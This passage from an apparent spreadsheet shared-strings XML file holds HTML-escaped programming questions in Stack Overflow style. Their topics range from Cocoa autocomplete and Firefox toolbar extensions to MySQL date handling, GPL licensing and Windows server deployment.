    <t xml:space="preserve">&lt;p&gt;I'm wondering if there is an existing class or library code in Cocoa Touch that shows the user a list of real-time suggestions while they are entering text input, with the suggestions based on similarities between what they have already entered and previous entries.&lt;/p&gt;
&lt;p&gt;For instance, see how Safari on the iPod Touch shows realtime suggestions when you start to type in a URL, based on previously visited sites.&lt;/p&gt;
&lt;p&gt;If there is a standard way of doing this, I'd love to know! If not, suggestions for a reasonable way to implement this -- subclass UITextField and go from there? -- would be welcome.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert a Silverlight text to a path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to render a Silverlight text to a path or graphics object &lt;strong&gt;at runtime&lt;/strong&gt;? I know this can be done using the design tools, but I want to be able to do this on the fly.&lt;/p&gt;
&lt;p&gt;I've seen an example that &lt;a href="http://blogs.msdn.com/webnext/archive/2007/05/22/silverlight-convert-text-to-path.aspx" rel="nofollow"&gt;calls a webservice which uses WPF constructs to convert a WPF FormattedText object to a PathGeometry&lt;/a&gt;, but those objects aren't available in Silverlight.&lt;/p&gt;
&lt;p&gt;I'm pretty sure this just isn't supported in Silverlight, but thought it was worth asking.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi object persistence, what is the best way</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed  application for drawing some shapes (lines mostly) , now i need to be able to store  sketch to a file, i know that delphi has build in routines for object persistance, but i have never used it. &lt;/p&gt;
&lt;p&gt;Can someone tell me can object persistence be used if i have to persist object that have also references to other objects (that will be stored to), i have TLine object wich can be connected to other TLine object etc. &lt;/p&gt;
&lt;p&gt;Is it better to use this feature or write custom procedure to store/read object to/from file.&lt;/p&gt;
&lt;p&gt;thx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google Friend Connect - Logged in user profile info</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to implement Google Friend Connect. Is it possible to obtain the email address of the logged in user? If so how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make Firefox extension auto install in nav bar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a Firefox extension. I'd like to make it auto-install in the far right position on the nav bar when a user installs it. As it stands, a user has to go to View &gt; Toolbars &gt; Customize... and drag the extension to the nav bar once it's installed. I'd like to eliminate this step.&lt;/p&gt;
&lt;p&gt;The extension is here: &lt;a href="http://madan.org/tickertool" rel="nofollow"&gt;http://madan.org/tickertool&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The XUL for my extension looks basically like this and it overlays browser.xul:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;overlay id="my-ext-overlay" ... &amp;gt;
    &amp;lt;toolbarpalette id="BrowserToolbarPalette"&amp;gt;
        &amp;lt;toolbaritem id="my-ext-container" ... &amp;gt;
            &amp;lt;toolbarbutton id="my-ext-customize-image" ... /&amp;gt;
            &amp;lt;textbox id="my-ext-textbox" ... /&amp;gt;
            &amp;lt;hbox id="my-ext-buttons"&amp;gt;
                &amp;lt;image id="my-ext-button1" ... /&amp;gt;
                &amp;lt;image id="my-ext-button2" ... /&amp;gt;
                &amp;lt;image id="my-ext-button3" ... /&amp;gt;
            &amp;lt;/hbox&amp;gt;
        &amp;lt;/toolbaritem&amp;gt;
    &amp;lt;/toolbarpalette&amp;gt;
&amp;lt;/overlay&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've seen code here ( &lt;a href="https://developer.mozilla.org/en/Code_snippets/Toolbar" rel="nofollow"&gt;https://developer.mozilla.org/en/Code_snippets/Toolbar&lt;/a&gt; ) that supposedly does what I'm looking for, but this code is if your extension is just a single button and I can't get it to work for me. The answer to my question is likely some modification of this code, but I haven't figured it out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting a PHP DateTime object into a string representation of a MYSQL date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DateTime which I want to store in a Date MySQL column. I am using MySQLi and prepared statements. &lt;/p&gt;
&lt;p&gt;When binding parameters, I cannot specify date as a type, only strings and integers.&lt;/p&gt;
&lt;p&gt;How do I convert the DateTime to a MySQL date string representation? There is very little documentation on the DateTime class.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP to ASP.NET - call_user_func() equivalent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if there is an equivalent function to PHP's &lt;code&gt;call_user_func()&lt;/code&gt; in ASP.NET application. I'm looking to do a conversion from a PHP application to ASP.NET as a means of teaching myself the language, by taking a CMS I built professionally and trying to recreate it in this other language.&lt;/p&gt;
&lt;p&gt;The reason I need a function similar to this, is because the current structure of my PHP CMS involves a plugin architecture, and specific parts of the CMS expose themselves for the plugins, and it then handles the returned information as an array. It's pretty much the same system Drupal uses.&lt;/p&gt;
&lt;p&gt;Am I perhaps on the wrong track with this?&lt;/p&gt;
&lt;p&gt;I think for clarification I should provide an example of how this works in my current system:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
class Test {
    function TestMessage() {
        // set up array
        $arrTest = array("Hello", "World");
        // get extra values from all available plugins
        $arrExtras = CMS::InvokeHook("HelloTest");
        // now contains Hello, World, Foo, Bar
        $arrTests = array_merge($arrTest, $arrExtras);
    }
}
class CMS {
    InvokeHook($function) {
        // now contains a couple plugins
        $plugins = CMS::GetPlugins();
        // empty array of values
        $values = array();
        foreach($plugins as $plugin) {
            // if this plugin has the called method...
            if(method_exists($plugin, $function)) {
                // call the function and merge in the results
                $values[] = call_user_func(array($plugin, $function));
            }
        }
        // return results as an array
        return $values;
    }
}
class FooTest {
    function HelloTest() {
        return "Foo";
    }
}
class BarTest {
    function HelloTest() {
        return "Bar";
    }
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;NOTE: The InvokeHook() call is simplified as I'm writing this from memory, but that is the gist of it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is my mounted MacFUSE NTFS vol read-only?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got the impression from the &lt;a href="http://code.google.com/p/macfuse/" rel="nofollow"&gt;MacFUSE&lt;/a&gt; site that when you install it and connect an NTFS volume it will be writable. However, the volume I mounted is read only. Here is some of the output of &lt;code&gt;mount&lt;/code&gt;...&lt;/p&gt;
&lt;p&gt;The NTFS external USB drive I'm talking about:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/dev/disk1s1 on /Volumes/SATA160 (local, nodev, nosuid, read-only)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;An OS X format external USB drive (for comparison):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/dev/disk3s3 on /Volumes/USB_ext_drive_40_GB (local, nodev, nosuid, journaled)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do I need to set something somewhere? Edit a config file?&lt;/p&gt;
&lt;p&gt;I'm on OS 10.4 (Tiger).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting a development team from FTP to a Versioning System</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work at a small LAMP Development Studio where the idea has been to just get the code done and go on to the next item on the list.&lt;/p&gt;
&lt;p&gt;The team works in Zend Studio 5.5 connected to the Live server via FTP or SFTP. What they love about this is the speed of their deployment of code (since its just modifying live code).&lt;/p&gt;
&lt;p&gt;But of course this is not good due to many obvious reasons.&lt;/p&gt;
&lt;p&gt;I would like to move them to a Versioning System (CVS, SVN or any other tool) but the catch is, I am not their senior so I need a carrot for them to start using this.&lt;/p&gt;
&lt;p&gt;What kind of setup would I need to build on their machine so they can code along as usual?&lt;/p&gt;
&lt;p&gt;What I would do is create this setup on my machine and then show them. &lt;/p&gt;
&lt;p&gt;I know this is kinda unusual but it's turned into a passion of mine to change their way of thinking from the usual hacking of code to structure and elegance. Thanks.&lt;/p&gt;
&lt;p&gt;UPDATE (for Jonathan Leffler's answer):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Yes&lt;/li&gt;
&lt;li&gt;No&lt;/li&gt;
&lt;li&gt;Yes, they really do&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Question also, the studio makes a centralized CMS system that is hosted on hundreds of sites, they need to modify individual sites, should the sites be in the main compository or within their own one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The future direction of Help File formats</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It would appear that CHM help files are no longer the help file format of choice.&lt;/p&gt;
&lt;p&gt;WinHelp&lt;br /&gt;
 - obsolete&lt;/p&gt;
&lt;p&gt;HtmlHelp (CHM)&lt;br /&gt;
 - not supported on Vista by default&lt;br /&gt;
 - does not work well on a network share&lt;/p&gt;
&lt;p&gt;Help 2 (HXS)&lt;br /&gt;
 - I understand this is used in VS2005+ for displaying help&lt;/p&gt;
&lt;p&gt;Web Based&lt;br /&gt;
 - Could be hard to manage for multiple versions&lt;/p&gt;
&lt;p&gt;What help file format would you use in a new (C#) application that provides multiple versions from the same codebase?&lt;/p&gt;
&lt;p&gt;We would like to use CHM help however it doesn't appear to be the direction that Microsoft wants us to move in. &lt;/p&gt;
&lt;p&gt;Does anyone employ HXS for their help files?&lt;/p&gt;
&lt;p&gt;Feeback appreciated&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Update based upon lassevk comments;&lt;/p&gt;
&lt;p&gt;Looks as though HXS help is not intended to be used for normal help projects. &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CommandBars.FindControl throwing an exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use the FindControl Method of the CommandBars object in a VSTO Word addin to get &lt;em&gt;what else&lt;/em&gt; a command bar object
Code is as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; private void WireContextMenu(string MenuID,string Tag, string ID, ref Office.CommandBarButton Control)
    {
        try
        {
            object missing = System.Type.Missing;
            Control = (Office.CommandBarButton)this.Application.CommandBars[MenuID].FindControl((object)Office.MsoControlType.msoControlButton, ID, Tag, missing, missing);
            if (Control == null)
            {
                Control = (Office.CommandBarButton)this.Application.CommandBars[MenuID].Controls.Add(Office.MsoControlType.msoControlButton, ID, missing, missing, missing);
                Control.Caption = "Biolit Markup Selection";
                Control.Tag = Tag;
            }
            Control.Click += new Microsoft.Office.Core._CommandBarButtonEvents_ClickEventHandler(this.cb_Click);
        }
        catch (Exception Ex)
        {
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The FindControl method is throwing a Type Mismatch Exception (-2147352571)
Any ideas
is this the right way anyhow to add a item to the right click menu of word and then make sure you dont add it if it already exists
Thanks &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unicode Regex; Invalid XML characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The list of valid XML characters is well known, as defined by the spec it's:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is whether or not it's possible to make a PCRE regular expression for this (or its inverse) without actually hard-coding the codepoints, by using Unicode general categories. An inverse might be something like [\p{Cc}\p{Cs}\p{Cn}], except that improperly covers linefeeds and tabs and misses some other invalid characters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Frame position in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having a frame-based webpage with 3 frames. A topliner, a navigation on the left side and a content frame on the bottom right side.&lt;/p&gt;
&lt;p&gt;Now, I want to show up a popup-menu when the user right-clicks on the content-frame. Because a div-container can not go out of the frame, my idea was, placing the whole frame-page into a new iframe. In that page I could have a second iframe which is my popup-menu.&lt;/p&gt;
&lt;p&gt;So now, I am having this layout:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt; (start-page)
  &amp;lt;iframe  (real content)
    &amp;lt;frameset 
      top-frame
      navigation-frame
      content-frame
    &amp;gt;
  &amp;gt;
  &amp;lt;iframe&amp;gt; (my popup-menu, positioned absolutelly and hidden by default)
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my content-frame I am having a "onmouseover"-event assigned to the body-tag. This event should open the popup-iframe at the current mouse-position. And exactly here is my problem: How to get the mouse-coordinates relativelly to the top-website (start-page in my draft)?&lt;/p&gt;
&lt;p&gt;Currently I am having this mouseDown-function (works in IE only, right now - but getting it working in FF &amp;amp; Co shouldn't be the problem...)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function mouseDown(e)
{
  if (window.event.button === 2 || window.event.which === 3) 
  {
    top.popupFrame.style.left = event.screenX + "px";
    top.popupFrame.style.top = event.screenY + "px";
    top.popupFrame.style.display = "";
    return false;
  }    
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, the "event.screenX" and "screenY" - variables are not that variables I can use, because they are not relative to the mainpage.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do firefox extensions make use of the whole screen in 3D (eg. CoolIris)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that &lt;a href="http://www.mozilla.com/en-US/" rel="nofollow"&gt;Firefox&lt;/a&gt; addins can be created in Javascript and Chrome.&lt;/p&gt;
&lt;p&gt;How do they run advanced graphics applications such as &lt;a href="http://www.cooliris.com/" rel="nofollow"&gt;CoolIris&lt;/a&gt; ?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.cooliris.com/static/images/product/slider1.png" alt="alt text" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database design question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I accumulated a quite a lot of data in a raw form (csv and binary) - 4GB per day for a few months to be precise.&lt;/p&gt;
&lt;p&gt;I decided to join the civilized world and use database to access the data and I wondered what would be the correct layout; the format is quite simple: a few rows for every time tick (bid, ask, timestamp, etc.) x up to 0.5Million/day x hundreds of financial instruments x monthes of data.&lt;/p&gt;
&lt;p&gt;There is a MySQL server with MYISAM (which I understood would be the correct engine for this type of usage) running on commodity harware (2 x 1GB RAID 0 SATA, core 2 @ 2.7GHz)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What would be correct layout of the database? How should the tables/indices look like? What are the general recommendations with this scenario? What would you predict set me pitfalls along the way?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Edit: my common usage will be simple queries to extract time series information for a specific date and instruments, e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT (ask + bid) / 2
  WHERE instrument='GOOG'
  AND date = '01-06-2008'
  ORDER BY timeStamp;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit: I tried to stuff all my data in one table indexed by the timeStamp but it was way too slow - therefore I reckoned it would take a more elaborate scheme.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can any one provide me a sample of using CreateHatchBrush</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to draw a shadow around a thumbnail in my software.
It seems CreateHatchBrush can help but I do not know how to use it, can anyone provide me a sample in C++?
Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using FTP with NSURL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write a cocoa application which downloads a file using ftp. I read about the NSURL class which has "NSURLHandle FTP Property Keys". I want to know how do I make use of these constants to provide username and password to the ftp site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can one add an XML file in classpath at runtime in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not sure if a URLClassLoader can be used. Also, only the relative path of the XML is known.&lt;/p&gt;
&lt;p&gt;Thank You.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to design interface for a game in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're a team of a designer and a programmer. Me, the programmer, is hopeless on design of all sorts, so the user interface of the game must be created by the designer. We were thinking of a main screen, where the character walks around, a small minimap in the top, an inventory section, etc.&lt;/p&gt;
&lt;p&gt;All these things would have to be designed in a way that looks pretty, i.e nice graphics/buttons/colors etc. I'm assuming that the designer will create an outline of this interface in photoshop/illustrator, then send me the file in .png or .jpeg format and I'll implement it into the program, making sure the buttons all work, etc.&lt;/p&gt;
&lt;p&gt;My question is, is this the correct method for doing this? Should he send me the interface's layout in a .png/.jpeg format, or send me only the buttons and I have to code the rest of the interface manually in java, putting the buttons/icons where they need to be, etc. If so, how can I do this? Any classes/frameworks that do this?&lt;/p&gt;
&lt;p&gt;Any guidelines at all will be helpful. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: What does the [string] indexer of Dictionary return?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does the &lt;code&gt;[string]&lt;/code&gt; indexer of &lt;code&gt;Dictionary&lt;/code&gt; return when the key doesn't exist in the Dictionary?  I am new to C# and I can't seem to find a reference as good as the Javadocs.&lt;/p&gt;
&lt;p&gt;Do I get &lt;code&gt;null&lt;/code&gt;, or do I get an exception?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best method to find the newest last modified time of a folder of files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a folder with subfolders of files.  I would like to get the newest filename by modified time.  Is there a more efficient way of finding this short of looping through each folder and file to find it?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>incrementing array value with each button press?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a calculator in C#. 
I am not sure what the best way is to have it increment a number in an array every time the button is pressed. Here is one of my current button event handler methods:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    //Assign button '2' to 2 with array address of 1
    private void num2_Click(object sender, EventArgs e)
    {
        numbers[1] = 2;
        lblUpdate(1);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like it so every time this button is pressed, numbers[1] gets increased by 2. Right now, it just gets set to 2 no matter how many times the button is pressed.&lt;/p&gt;
&lt;p&gt;Thanks so much!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linking a Bundle Target to a Command-Line Target in Xcode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project in Xcode that contains multiple targets. One of these builds a sync schema bundle, and another one builds a Foundation command-line tool that initiates a sync session using the schema defined in the bundle.&lt;/p&gt;
&lt;p&gt;The schema bundle template creates &lt;code&gt;Schema-strings.h&lt;/code&gt; and &lt;code&gt;Schema-strings.m&lt;/code&gt; files, which contain constants for data class names, entity names, and attribute names, and I'd like to use these constants in my command-line tool's code.&lt;/p&gt;
&lt;p&gt;How do I configure the targets to make this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Selecting "Window" Around Particular Row</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's quite possible a question like this has been asked before, but I can't think of the terms to search for.&lt;/p&gt;
&lt;p&gt;I'm working on a photo gallery application, and want to display 9 thumbnails showing the context of the current photo being shown (in a 3x3 grid with the current photo in the centre, unless the current photo is in the first 4 photos being shown, in which case if e.g. if the current photo is the 2nd I want to select photos 1 through 9). For example, given an album containing the list of photos with ids:&lt;/p&gt;
&lt;p&gt;1, 5, 9, 12, 13, 18, 19, 20, 21, 22, 23, 25, 26&lt;/p&gt;
&lt;p&gt;If the current photo is 19, I want to also view:&lt;/p&gt;
&lt;p&gt;9, 12, 13, 18, 19, 20, 21, 22, 23&lt;/p&gt;
&lt;p&gt;If the current photo is 5, I want to also view:&lt;/p&gt;
&lt;p&gt;1, 5, 9, 12, 13, 18, 19, 20, 21&lt;/p&gt;
&lt;p&gt;I've been thinking of something along the lines of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT *
FROM photos
WHERE ABS(id - currentphoto) &amp;lt; 5
ORDER BY id ASC 
LIMIT 25
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this doesn't work in the case where the ids are non-sequential (as in the example above), or for the case where there are insufficient photos before the currentphoto.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Dom&lt;/p&gt;
&lt;p&gt;p.s. Please leave a comment if anything is unclear, and I'll clarify the question. If anyone can think of a more useful title to help other people find this question in future, then please comment too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to modify page URL in Google Analytics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you modify the URL for the current page that gets passed to Google Analytics?  &lt;/p&gt;
&lt;p&gt;(I need to strip the extensions from certain pages because for different cases a page can be requested with or without it and GA sees this as two different pages.)  &lt;/p&gt;
&lt;p&gt;For example, if the page URL is &lt;code&gt;http://mysite/cake/ilikecake.html&lt;/code&gt;, how can I pass to google analytics &lt;code&gt;http://mysite/cake/ilikecake&lt;/code&gt; instead?&lt;/p&gt;
&lt;p&gt;I can strip the extension fine, I just can't figure out how to pass the URL I want to Google Analytics.  I've tried this, but the stats in the Google Analytics console don't show any page views:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;pageTracker._trackPageview('cake/ilikecake');&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thanks,
Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change Assembly Version in a compiled .NET assembly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question... is there a way to change the Assembly Version of a compiled .NET assembly?&lt;/p&gt;
&lt;p&gt;I'd actually be fine with a way to change the Assembly File Version.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSSQL 2005 Fulltext search setup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm beginning my foray into fulltext search for MSSQL2005. This is a new, in-dev database, so I can monkey around with it.&lt;/p&gt;
&lt;p&gt;Let's say I have a "Form" table that has a one-to-many relationship to two other tables, "Answer" and "Comment." I want the user to be able to enter one search term and have it peg all three of those tables via fulltext search. What's the best way? It appears as though I can create an &lt;a href="http://www.microsoft.com/technet/prodtechnol/sql/2005/impprfiv.mspx" rel="nofollow"&gt;indexed view&lt;/a&gt; to speed things along.&lt;/p&gt;
&lt;p&gt;If I do use an indexed view (is this the best route anyway?), how do I handle the one-to-many relationships? Let's assume all I really want to figure out is the ID of the "Form" table that would contain any search results found in the child Answer/Comment tables, so I can show the entire form that contains the located entries. An inner join on the view would result in multiple "master" form rows being returned - doesn't sound great for performance. How about concatenating all child answer/comment rows into one "column" for the view? So instead of....&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Form 1, Answer A, Comment A 
Form 1, Answer B, Comment A 
Form 1, Answer A, Comment B 
Form 1, Answer B, Comment B
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...it'd be...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Form 1, Answer A Answer B, Comment A Comment B
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Remember all I care about is the ID of that master "form" row.&lt;/p&gt;
&lt;p&gt;This seems logical to me, but I'm not sure the best practices around fulltext search yet, so just curious if I'm approaching it correctly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Looks like indexed views are pretty strict; no left joins, no subqueries, so I might go down the path of a summary table populated by triggers if it isn't going to be too unwieldy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the implications of using GPL django apps in a non-GPL django project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I was to integrate a third-party GPLv3,v2 or LGPL django app in my django project, would the licence apply to the complete project or just the third-party application I'm using?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crystal reports 11: How to handle or trim special characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my crystal report, I noticed one of the fields being pulled from a table has special characters.  More specifically carriage returns and tabs.  Is there a way to strip this out, so it doesn't show up blank in my reports?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Application of [L]GPL to Java/C# code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How the [L]GPL license should be applied to Java and C# code ? I know that when Sun JDK become GPL, they did special exceptions for standard libraries. &lt;/p&gt;
&lt;p&gt;So, if I cannot open my application source and still want to distribute it ...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;... could I use GPL'ed library (by &lt;strong&gt;import&lt;/strong&gt;'ing its classes)?&lt;/li&gt;
&lt;li&gt;... could I use LGPL'ed one&lt;/li&gt;
&lt;li&gt;... could my application run on top of GPL'ed Application Server (using its services and APIs)  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In all above questions GPL = GPL v.2.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Task Schedule Refusal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Although some might not think of it as programming related, it certainly is.  The task Scheduler is a program.   It's launching a process that I have written.   Stating that it's a common problem is not very helpful.&lt;/p&gt;
&lt;p&gt;I've set up my own backup procedures, both on a Windows xP machine at home, and on several at the office, where I use the task scheduler to start a backup file which does an xcopy of all files with a newer date than what's on the backup drive TO the backup drive.&lt;/p&gt;
&lt;p&gt;Trying to set this up for a friend, I can't get the task scheduler to run, even with his log-in password set up.&lt;/p&gt;
&lt;p&gt;He recently got rid of all his Norton anti-virus. . . Is there perhaps a connection?&lt;/p&gt;
&lt;p&gt;I also have my own Windows 2000 machine, from which I long ago removed Norton, and the task scheduler doesn't work there either. . . It's not that important there, since there's not much data volatility on that machine anymore.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Disk Cloning vs Automatic installation of servers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;During development , testing, and deployment, I have a need to fully automate a windows 2003 server setup.&lt;/p&gt;
&lt;p&gt;I'm trying to find the best way to automatically delpoy a server, which installs the OS, software dependencies that I have (for example SQL server, .net framework + my own application code).&lt;/p&gt;
&lt;p&gt;From what I've found , there are two approaches to this issue:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Disk Cloning (also known as disk imaging). Using tools like Ghost, Acronis.&lt;/li&gt;
&lt;li&gt;Unattended installation of OS + SW. Using RIS (now called WDS), or &lt;a href="http://unattended.sourceforge.net/" rel="nofollow"&gt;Unattended&lt;/a&gt;, basically running an unattended installation of the OS and then an unattended installation of all software needed at first boot (using the various command line flags of windows installation managers like MSI,InstallSheld.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Unattended installation pros:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The advantage of having the entire installation &amp;amp; configuration self documented in the scripts/configuration that create the unattended installation &lt;/li&gt;
&lt;li&gt;These scripts/configuration can sit in a revision control system.&lt;/li&gt;
&lt;li&gt;Using &lt;a href="http://driverpacks.net/" rel="nofollow"&gt;DriverPacks&lt;/a&gt; can give the flexibility to install on just about any hardware.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Unattended installation cons:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Take much longer to fully deploy.&lt;/li&gt;
&lt;li&gt;More work to accomplish than disk cloning where you just have to install , configue a server manually, and then clone it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Disk Cloning pros:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Less work to create clones.&lt;/li&gt;
&lt;li&gt;Fast deployment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Disk Cloning cons:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Very hard to keep track of configuration/installation changes that took place before cloning as none of it is scripted.&lt;/li&gt;
&lt;li&gt;The resulting deployment is not as "clean" as a scratch installation, requiring he use of SysPrep or the likes.&lt;/li&gt;
&lt;li&gt;Hardware / Driver issues might come up when restoring a disk clone to a new hardware.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I know this is not strictly a programming question (although writing an unattended windows + S/W installation does require some coding), but it is something we all have to do from time to time and we might as well come up with the best possible way to do this.&lt;/p&gt;
&lt;p&gt;Edit : More info on the situation:
Virtualization is a nice option for development, but for testing and especially stress testing, real hardware ,with  fast disks will have to be used.&lt;/p&gt;
&lt;p&gt;The need is to develop a Windows Server 2003 &amp;amp; SQL Server 2005 server appliance &amp;amp; an in house application. So this will be deployed in house for development &amp;amp; testing and eventually be sold to customers.&lt;/p&gt;
&lt;p&gt;So basically what I'm asking is: What is the recommended way to install development,testing and production servers? Disk Cloning ? Automatic installation? A combination of both?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Split by \b when your regex engine doesn't support it</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I split by word boundary in a regex engine that doesn't support it?&lt;/p&gt;
&lt;p&gt;python's re can match on \b but doesn't seem to support splitting on it. I seem to recall dealing with other regex engines that had the same limitation.&lt;/p&gt;
&lt;p&gt;example input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"hello, foo"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;expected output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;['hello', ', ', 'foo']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;actual python output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; re.compile(r'\b').split('hello, foo')
['hello, foo']
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
